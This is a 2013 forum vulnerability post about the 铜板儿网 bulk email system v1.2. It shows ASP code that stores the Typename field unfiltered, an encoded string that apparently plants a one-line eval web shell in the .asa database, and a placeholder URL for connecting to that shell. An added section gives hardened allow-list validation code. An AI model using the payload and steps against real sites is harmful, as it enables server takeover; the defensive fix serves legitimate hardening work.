China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: 铜板儿网 Bulk Email Sending and Statistics System v1.2 vulnerability

Author: admin    Time: 2013-3-14 20:14
'Fenlei.asp

IF Request.QueryString("Action")="del" Then
ID=Request.QueryString("ID")
IF Countss ("tui","Fenlei",ID )<>0 then
' (omitted)
IF Request.QueryString("Action")="Add" Then
Tname=Request.Form("Typename")
Set Rs=Server.CreateObject("adodb.Recordset")
Sql="Select * From Fenlei Order by id Desc "
Rs.Open Sql,Conn,1,3
Rs.Addnew
Rs("Typename")=Tname
' (omitted)
Set Rs=Server.CreateObject("adodb.Recordset")
Sql="Select * From Fenlei Order by id Desc "
Rs.Open Sql,Conn,1,1
' (omitted)
%>

No filtering is applied: the submitted Typename is written directly to the database.

Exploitation method:

Insert: ┼攠數畣整爠煥敵瑳∨≡┩>

Connect: http://www.xxx.com/###tongbaner.asa
'Default installation file:
'install.asp
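
A hardened form of the "Add" branch shown above, as an added example that is not part of the original post or the product's own code. It assumes Conn is the open ADODB connection the original page already uses; IsSafeTypename and MAX_TYPENAME_LEN are hypothetical names, and the ASCII-only allow-list is an assumption a site would adjust to its own naming needs.

```vbscript
<%
' Added example (not the product's code): validate Typename before Rs.AddNew.
' Assumes Conn is the open ADODB.Connection used by the original Fenlei.asp.
' IsSafeTypename and MAX_TYPENAME_LEN are hypothetical names.
Const MAX_TYPENAME_LEN = 50

Function IsSafeTypename(s)
    Dim re
    IsSafeTypename = False
    ' Reject empty and over-long names before any pattern matching.
    If Len(s) = 0 Or Len(s) > MAX_TYPENAME_LEN Then Exit Function
    Set re = New RegExp
    ' Allow-list: ASCII letters, digits, space, underscore, hyphen.
    ' Anything else, including < % > and non-ASCII characters, is rejected.
    re.Pattern = "^[A-Za-z0-9 _-]+$"
    IsSafeTypename = re.Test(s)
End Function

Dim Tname, Rs
If Request.QueryString("Action") = "Add" Then
    Tname = Trim(Request.Form("Typename"))
    If Not IsSafeTypename(Tname) Then
        ' Refuse the request instead of storing the value.
        Response.Status = "400 Bad Request"
        Response.End
    End If
    Set Rs = Server.CreateObject("ADODB.Recordset")
    Rs.Open "Select * From Fenlei Order by id Desc", Conn, 1, 3
    Rs.AddNew
    Rs("Typename") = Tname   ' only allow-listed text reaches the table
    Rs.Update
    Rs.Close
    Set Rs = Nothing
End If
%>
```

Input validation closes the unfiltered write the post describes; keeping the database file outside the web root, or under an extension the server does not execute, removes the condition that makes stored text dangerous.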



